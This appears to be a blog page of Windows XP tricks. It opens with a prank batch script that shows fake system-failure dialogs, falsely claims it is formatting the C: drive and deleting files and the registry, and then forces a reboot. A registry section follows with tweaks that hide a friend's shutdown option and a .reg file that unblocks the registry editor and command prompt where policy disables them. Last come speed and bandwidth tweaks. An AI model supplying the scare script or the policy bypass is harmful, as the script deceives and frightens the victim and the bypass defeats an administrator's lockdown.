echo Wscript.Sleep 4000 > C:\sleep1.vbs
call C:\sleep1.vbs
echo Msgbox"Critical system process failure. Press enter to to begin auto fix." > c:\error1.vbs
call c:\error1.vbs
echo Formatting c: drive...
echo Wscript.Sleep 2000 > C:\sleep2.vbs
call C:\sleep1.vbs
echo The following files were are infected and should be deleted immediately
call C:\sleep1.vbs
dir /s C:\*.exe
dir C:
call C:\sleep1.vbs
cls
echo Deleting files 36 percent complete
call C:\sleep2.vbs
echo Deleting files 79 percent complete
call C:\sleep2.vbs
echo Deleting files 100 percent complete
call C:\sleep2.vbs
echo Files successfully deleted
call C:\sleep1.vbs
cls
echo All files in the windows registry were also deleted
echo a full reinstall is required to continue using windows
call C:\sleep2.vbs
echo Msgbox"Windows is not responding, shutting down" > c:\error2.vbs
call C:\error2.vbs
call C:\sleep2.vbs
echo Msgbox"Applications will automatically closed, all unsaved data will be lost" > C:\error3.vbs
call C:\error3.vbs
cls
ECHO 
ECHO --------------------------------------------------------------------------
call C:\sleep1.vbs
shutdown -r -t 5
(this code is bat so save in note pad as whateveryouwant.bat)
====================================================================

Regedit This is a featured page

Regedit, You may be thinking "Regedit, what the hell is that?!" or if you have a reasonable amount of experience with computers "Oh awesome a page about what this program is. What is Regedit? Regedit is basically a program that lets you edit ceratin values in your computer (short for "Registry Editor"). BEWARE, DON'T JUST PLAY AROUND IN REGEDIT, SOME THINGS CAN SERIOUSLY HARM YOUR COMPUTER IF CHANGED OR REMOVED. You can do really cool things with it such as remove buttons on your computer .e.g remove the shutdown option or make a message appear at startup. Before you do anything you will need to know how to access the program.: So first go to your start menu Then click run Now type "regedit" without the quotes Regedit should open (if it doesnt contact me) How to display a legal notice on startup This is how to make a legal notice appear on startup: Open Regedit Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" legalnoticecaption:"enter your notice caption here" legalnoticetext:"enter your legal notice text here" Add admin user to welcome screen: Start the Registry Editor Go to: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \ Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart. Kill Processes immediately: When logging off, you sometimes get an “End Task” dialog prompt, indicating a program that doesn’t shut itself down. You can suppress the prompts and have Windows kill these programs automatically when you log off. In regedit, find key HKEY_CURRENT_USER\Control Panel\Desktop Look for the value AutoEndTasks, and change it from 0 to 1. No Shutdown:Wanna play with your friends by removing the shutdown option from start menu in their computer. Regedit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer "NoClose"="DWORD:1" Show Superhidden Files: Even if you turn on show hidden files in Windows Explorer some files will remain hidden. These files are super hidden. Set the registry value below to 1.  Unblock Regedit and CMD prompt:Save this file is a .reg file then execute it REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0  Memory Performance Improving memory performance can be done simply by preventing your hard drive from being used for cache. This is only useful with 256Mb or more of RAM. Everything that you'll need to edit here can be found in HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management So of course add [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] to your *.reg file. Disable Paging Executive This will prevent pages sections from RAM going to the hard drive. If you have a large amount of RAM at least 256Mb (I suggest 512) you might want to keep the data in your RAM to improve your performance considerably due to reduced amount of hard drive swappage. The entry that you will want to modify is called DisablePagingExecutive. Changing this from 0 to 1 will keep the data in your RAM. "DisablePagingExecutive"=dword:00000001 System Cache Boost The XP kernel can be loaded into your RAM with a simple registry edit. This can greatly improve performance since the NT Kernel will always be in your RAM. With this edit you will allocate roughly 4Mb of your RAM for the kernel. Sometimes more RAM is used but most of the time it is only 4Mb. The entry that you will need to find is called LargeSystemCache and you'll need to change this from 0 to 1 in order to enable this.  "LargeSystemCache"=dword:00000001 To put both of these RAM tweaks into use you'll add something like this to your reg file [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] "DisablePagingExecutive"=dword:00000001 "LargeSystemCache"=dword:00000001 The XP Prefetcher Windows XP has a service called the Prefetcher. It basically monitors the different programs that start during startup and helps them launch faster. To find this tool browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters  The important key is EnablePrefetcher. Default value for this is 3. You will want to try numbers between 1 and 6. 5 seems to work best for me but your mileage may vary. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters] "EnablePrefetcher"="5"
============================================================================ 
=

speed up your internetThis is a featured page

Increase BROADBAND speed in WinXP *Should work for 56k also* 
1. make sure your logged on as actually "Administrator". do not log on with any account that just has administrator privileges.  2. start - run - type gpedit.msc (not available in home version) 3. expand the "local computer policy" branch  4. expand the "administrative templates" branch  5. expand the "network branch"  6. Highlight the "QoS Packet Scheduler" in left window  7. in right window double click the "limit reservable bandwidth" setting  8. on setting tab check the "enabled" item  9.where it says "Bandwidth limit %" change it to read 0  Effect is immediate on some systems, some need to re-boot. This is more of a "counter what XP does" thing. In other words, XP seems to want to reserve 20% of the bandwidth for its self, even with QoS disabled. So why not use it to your advantage. To demonstrate the problem with this on stand alone machines start up a big download from a server with an FTP client. Try to find a server that doesn't max out your bandwidth. In this case you want a slow to medium speed server to demonstrate this. Let it run for a couple of minutes to get stable. The start up another download from the same server with another instance of your FTP client. You will notice that the available bandwidth is now being fought over and one of the clients download will be very slow or both will slow down when they should both be using the available bandwidth. Using this "tweak" both clients will have a fair share of the bandwidth and will not fight over the bandwidth.  OR you could just uninstall it ;) Increase your cable modem or DSL speed in XP This tweak is for broad band cable connections on stand alone machines with winXP professional version - might work on Home version also. It will probably work with networked machines as well but I haven't tried it in that configuration. This is for windows XP only, it does not work on win2000. I use 3 Com cards so I don't know how it works on others at this point. It does not involve editing the registry. This tweak assumes that you have let winXP create a connection on install for your cable modem/NIC combination and that your connection has tcp/ip - QoS - file and print sharing - and client for microsoft networks , only, installed. It also assumes that winxp will detect your NIC and has in-box drivers for it. If it doesn't do not try this. In the "My Network Places" properties (right click on the desktop icon and choose properties), highlight the connection then at the menu bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK  1. From the windows XP cd in the support directory from the support cab, extract the file netcap.exe and place it in a directory on your hard drive or even in the root of your C:\ drive.  2. next, open up a command prompt window and change directories to where you put netcap.exe. then type "netcap/?". It will list some commands that are available for netcap and a netmon driver will be installed. At the bottom you will see your adapters. You should see two of them if using a 3Com card. One will be for LAN and the other will be for WAN something or other.  3. Next type "netcap/Remove". This will remove the netmon driver.  4. Open up control panel / system / dev man and look at your network adapters. You should now see two of them and one will have a yellow ! on it. Right click on the one without the yellow ! and choose uninstall. YES! you are uninstalling your network adapter, continue with the uninstall. Do not restart yet.  5. Check your connection properties to make sure that no connection exists. If you get a wizard just cancel out of it.  6. Now re-start the machine.  7. After re-start go to your connection properties again and you should have a new connection called "Local area connection 2". highlight the connection then at the menu bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK.  8. Choose connection properties and uncheck the "QOS" box  9. Re-start the machine  10. after restart enjoy the increased responsiveness of IE, faster page loading, and a connection speed boost.

No comments:

Post a Comment